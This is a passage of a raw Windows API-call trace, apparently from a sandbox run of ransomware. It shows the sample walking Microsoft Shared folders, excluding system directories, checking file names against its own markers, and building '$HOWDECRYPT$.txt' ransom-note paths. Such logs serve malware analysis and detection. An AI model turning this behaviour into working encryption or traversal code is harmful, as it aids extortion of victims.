(lpString="$Recycle.bin") returned 12 [0091.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.128] lstrlenW (lpString="System Volume Information") returned 25 [0091.128] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\.") returned 66 [0091.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.128] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.128] lstrlenW (lpString="Windows") returned 7 [0091.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.129] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.129] lstrlenW (lpString="System Volume Information") returned 25 [0091.129] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\..") returned 67 [0091.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.129] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.129] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.129] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\$HOWDECRYPT$.txt") returned 81 [0091.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\$HOWDECRYPT$.txt") returned 81 [0091.129] GetProcessHeap () returned 0x2c0000 [0091.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e8d8 [0091.129] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14c8) returned 0x3824f8 [0091.129] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.129] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.130] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\$HOWDECRYPT$.txt") returned 75 [0091.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\$HOWDECRYPT$.txt") returned 75 [0091.133] GetProcessHeap () returned 0x2c0000 [0091.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3469c8 [0091.133] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d0) returned 0x3824f8 [0091.134] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.134] lstrcmpiW (lpString1="VBA", lpString2="Windows") returned -1 [0091.134] lstrlenW (lpString="Windows") returned 7 [0091.134] lstrcmpiW (lpString1="VBA", lpString2="$Recycle.bin") returned 1 [0091.134] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.134] lstrcmpiW (lpString1="VBA", lpString2="System Volume Information") returned 1 [0091.134] lstrlenW (lpString="System Volume Information") returned 25 [0091.134] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA") returned 54 [0091.134] lstrcmpW (lpString1="VBA", lpString2=".") returned 1 [0091.134] lstrcmpW (lpString1="VBA", lpString2="..") returned 1 [0091.134] GetProcessHeap () returned 0x2c0000 [0091.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.135] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*") returned 56 [0091.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.145] lstrlenW (lpString="Windows") returned 7 [0091.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.145] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.145] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.145] lstrlenW (lpString="System Volume Information") returned 25 [0091.145] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\.") returned 56 [0091.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.145] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.145] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.145] lstrlenW (lpString="Windows") returned 7 [0091.145] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.145] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.145] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.145] lstrlenW (lpString="System Volume Information") returned 25 [0091.145] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\..") returned 57 [0091.145] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.145] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.145] lstrcmpiW (lpString1="VBA7", lpString2="Windows") returned -1 [0091.145] lstrlenW (lpString="Windows") returned 7 [0091.146] lstrcmpiW (lpString1="VBA7", lpString2="$Recycle.bin") returned 1 [0091.146] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.146] lstrcmpiW (lpString1="VBA7", lpString2="System Volume Information") returned 1 [0091.146] lstrlenW (lpString="System Volume Information") returned 25 [0091.146] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7") returned 59 [0091.146] lstrcmpW (lpString1="VBA7", lpString2=".") returned 1 [0091.146] lstrcmpW (lpString1="VBA7", lpString2="..") returned 1 [0091.146] GetProcessHeap () returned 0x2c0000 [0091.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0091.146] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*") returned 61 [0091.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.146] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.146] lstrlenW (lpString="Windows") returned 7 [0091.146] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.146] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.146] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.146] lstrlenW (lpString="System Volume Information") returned 25 [0091.146] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\.") returned 61 [0091.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.146] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.146] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.146] lstrlenW (lpString="Windows") returned 7 [0091.146] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.146] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.146] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.146] lstrlenW (lpString="System Volume Information") returned 25 [0091.147] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\..") returned 62 [0091.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.147] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.147] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0091.147] lstrlenW (lpString="Windows") returned 7 [0091.147] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0091.147] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.147] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0091.147] lstrlenW (lpString="System Volume Information") returned 25 [0091.147] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033") returned 64 [0091.147] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0091.147] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0091.147] GetProcessHeap () returned 0x2c0000 [0091.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0091.149] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*") returned 66 [0091.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0091.235] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.235] lstrlenW (lpString="Windows") returned 7 [0091.235] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.235] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.235] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.235] lstrlenW (lpString="System Volume Information") returned 25 [0091.235] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\.") returned 66 [0091.235] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.235] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.236] lstrlenW (lpString="Windows") returned 7 [0091.236] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.236] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.236] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.236] lstrlenW (lpString="System Volume Information") returned 25 [0091.236] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\..") returned 67 [0091.238] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.238] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.239] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.239] lstrcmpiW (lpString1="FM20.CHM", lpString2="Windows") returned -1 [0091.239] lstrlenW (lpString="Windows") returned 7 [0091.239] lstrcmpiW (lpString1="FM20.CHM", lpString2="$Recycle.bin") returned 1 [0091.239] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.239] lstrcmpiW (lpString1="FM20.CHM", lpString2="System Volume Information") returned -1 [0091.239] lstrlenW (lpString="System Volume Information") returned 25 [0091.239] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0091.239] StrStrIW (lpFirst="FM20.CHM", lpSrch=".spyhunter") returned 0x0 [0091.239] lstrcmpW (lpString1="FM20.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.239] lstrcmpW (lpString1="FM20.CHM", lpString2="_uninstalling_.png") returned 1 [0091.239] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 73 [0091.239] GetProcessHeap () returned 0x2c0000 [0091.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x3468e8 [0091.239] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14b0) returned 0x3824f8 [0091.239] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.239] lstrcmpiW (lpString1="VBCN6.CHM", lpString2="Windows") returned -1 [0091.239] lstrlenW (lpString="Windows") returned 7 [0091.239] lstrcmpiW (lpString1="VBCN6.CHM", lpString2="$Recycle.bin") returned 1 [0091.239] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.239] lstrcmpiW (lpString1="VBCN6.CHM", lpString2="System Volume Information") returned 1 [0091.239] lstrlenW (lpString="System Volume Information") returned 25 [0091.239] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0091.239] StrStrIW (lpFirst="VBCN6.CHM", lpSrch=".spyhunter") returned 0x0 [0091.240] lstrcmpW (lpString1="VBCN6.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.240] lstrcmpW (lpString1="VBCN6.CHM", lpString2="_uninstalling_.png") returned 1 [0091.240] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0091.240] GetProcessHeap () returned 0x2c0000 [0091.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x3469c8 [0091.240] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14b8) returned 0x3824f8 [0091.240] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.240] lstrcmpiW (lpString1="VBE7INTL.DLL", lpString2="Windows") returned -1 [0091.240] lstrlenW (lpString="Windows") returned 7 [0091.240] lstrcmpiW (lpString1="VBE7INTL.DLL", lpString2="$Recycle.bin") returned 1 [0091.240] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.240] lstrcmpiW (lpString1="VBE7INTL.DLL", lpString2="System Volume Information") returned 1 [0091.240] lstrlenW (lpString="System Volume Information") returned 25 [0091.240] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0091.240] StrStrIW (lpFirst="VBE7INTL.DLL", lpSrch=".spyhunter") returned 0x0 [0091.240] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.240] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="_uninstalling_.png") returned 1 [0091.240] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0091.240] GetProcessHeap () returned 0x2c0000 [0091.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377428 [0091.240] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14c0) returned 0x3824f8 [0091.240] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.240] lstrcmpiW (lpString1="VBENDF98.CHM", lpString2="Windows") returned -1 [0091.240] lstrlenW (lpString="Windows") returned 7 [0091.241] lstrcmpiW (lpString1="VBENDF98.CHM", lpString2="$Recycle.bin") returned 1 [0091.241] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.241] lstrcmpiW (lpString1="VBENDF98.CHM", lpString2="System Volume Information") returned 1 [0091.241] lstrlenW (lpString="System Volume Information") returned 25 [0091.241] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0091.241] StrStrIW (lpFirst="VBENDF98.CHM", lpSrch=".spyhunter") returned 0x0 [0091.241] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.241] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="_uninstalling_.png") returned 1 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0091.241] GetProcessHeap () returned 0x2c0000 [0091.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377d38 [0091.241] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14c8) returned 0x3824f8 [0091.241] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.241] lstrcmpiW (lpString1="VBHW6.CHM", lpString2="Windows") returned -1 [0091.241] lstrlenW (lpString="Windows") returned 7 [0091.241] lstrcmpiW (lpString1="VBHW6.CHM", lpString2="$Recycle.bin") returned 1 [0091.241] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.241] lstrcmpiW (lpString1="VBHW6.CHM", lpString2="System Volume Information") returned 1 [0091.241] lstrlenW (lpString="System Volume Information") returned 25 [0091.241] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0091.241] StrStrIW (lpFirst="VBHW6.CHM", lpSrch=".spyhunter") returned 0x0 [0091.241] lstrcmpW (lpString1="VBHW6.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.241] lstrcmpW (lpString1="VBHW6.CHM", lpString2="_uninstalling_.png") returned 1 [0091.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0091.242] GetProcessHeap () returned 0x2c0000 [0091.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346aa8 [0091.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d0) returned 0x3824f8 [0091.242] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.242] lstrcmpiW (lpString1="VBLR6.CHM", lpString2="Windows") returned -1 [0091.242] lstrlenW (lpString="Windows") returned 7 [0091.242] lstrcmpiW (lpString1="VBLR6.CHM", lpString2="$Recycle.bin") returned 1 [0091.242] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.242] lstrcmpiW (lpString1="VBLR6.CHM", lpString2="System Volume Information") returned 1 [0091.242] lstrlenW (lpString="System Volume Information") returned 25 [0091.242] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0091.242] StrStrIW (lpFirst="VBLR6.CHM", lpSrch=".spyhunter") returned 0x0 [0091.242] lstrcmpW (lpString1="VBLR6.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.242] lstrcmpW (lpString1="VBLR6.CHM", lpString2="_uninstalling_.png") returned 1 [0091.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0091.242] GetProcessHeap () returned 0x2c0000 [0091.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346b88 [0091.242] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d8) returned 0x3824f8 [0091.242] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.242] lstrcmpiW (lpString1="VBOB6.CHM", lpString2="Windows") returned -1 [0091.242] lstrlenW (lpString="Windows") returned 7 [0091.242] lstrcmpiW (lpString1="VBOB6.CHM", lpString2="$Recycle.bin") returned 1 [0091.242] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.243] lstrcmpiW (lpString1="VBOB6.CHM", lpString2="System Volume Information") returned 1 [0091.243] lstrlenW (lpString="System Volume Information") returned 25 [0091.243] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0091.243] StrStrIW (lpFirst="VBOB6.CHM", lpSrch=".spyhunter") returned 0x0 [0091.244] lstrcmpW (lpString1="VBOB6.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.244] lstrcmpW (lpString1="VBOB6.CHM", lpString2="_uninstalling_.png") returned 1 [0091.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 74 [0091.244] GetProcessHeap () returned 0x2c0000 [0091.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346c68 [0091.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14e0) returned 0x3824f8 [0091.244] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0091.244] lstrcmpiW (lpString1="VBUI6.CHM", lpString2="Windows") returned -1 [0091.244] lstrlenW (lpString="Windows") returned 7 [0091.244] lstrcmpiW (lpString1="VBUI6.CHM", lpString2="$Recycle.bin") returned 1 [0091.244] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.244] lstrcmpiW (lpString1="VBUI6.CHM", lpString2="System Volume Information") returned 1 [0091.244] lstrlenW (lpString="System Volume Information") returned 25 [0091.244] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0091.244] StrStrIW (lpFirst="VBUI6.CHM", lpSrch=".spyhunter") returned 0x0 [0091.244] lstrcmpW (lpString1="VBUI6.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.244] lstrcmpW (lpString1="VBUI6.CHM", lpString2="_uninstalling_.png") returned 1 [0091.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 74 [0091.244] GetProcessHeap () returned 0x2c0000 [0091.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346d48 [0091.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14e8) returned 0x3824f8 [0091.244] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0091.245] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0091.245] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\$HOWDECRYPT$.txt") returned 81 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\$HOWDECRYPT$.txt") returned 81 [0091.245] GetProcessHeap () returned 0x2c0000 [0091.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e8d8 [0091.246] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f0) returned 0x3824f8 [0091.246] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.246] lstrcmpiW (lpString1="VBE7.DLL", lpString2="Windows") returned -1 [0091.246] lstrlenW (lpString="Windows") returned 7 [0091.246] lstrcmpiW (lpString1="VBE7.DLL", lpString2="$Recycle.bin") returned 1 [0091.246] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.246] lstrcmpiW (lpString1="VBE7.DLL", lpString2="System Volume Information") returned 1 [0091.246] lstrlenW (lpString="System Volume Information") returned 25 [0091.246] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0091.246] StrStrIW (lpFirst="VBE7.DLL", lpSrch=".spyhunter") returned 0x0 [0091.246] lstrcmpW (lpString1="VBE7.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.246] lstrcmpW (lpString1="VBE7.DLL", lpString2="_uninstalling_.png") returned 1 [0091.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL") returned 68 [0091.246] GetProcessHeap () returned 0x2c0000 [0091.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e128 [0091.246] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f8) returned 0x3824f8 [0091.246] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.246] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.255] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\$HOWDECRYPT$.txt") returned 76 [0091.255] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\$HOWDECRYPT$.txt") returned 76 [0091.255] GetProcessHeap () returned 0x2c0000 [0091.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x377e20 [0091.255] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14f8) returned 0x3824f8 [0091.256] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.256] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.256] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\$HOWDECRYPT$.txt") returned 71 [0091.256] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\$HOWDECRYPT$.txt") returned 71 [0091.256] GetProcessHeap () returned 0x2c0000 [0091.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e200 [0091.256] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1500) returned 0x3824f8 [0091.257] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.257] lstrcmpiW (lpString1="VC", lpString2="Windows") returned -1 [0091.257] lstrlenW (lpString="Windows") returned 7 [0091.257] lstrcmpiW (lpString1="VC", lpString2="$Recycle.bin") returned 1 [0091.257] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.257] lstrcmpiW (lpString1="VC", lpString2="System Volume Information") returned 1 [0091.257] lstrlenW (lpString="System Volume Information") returned 25 [0091.257] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, 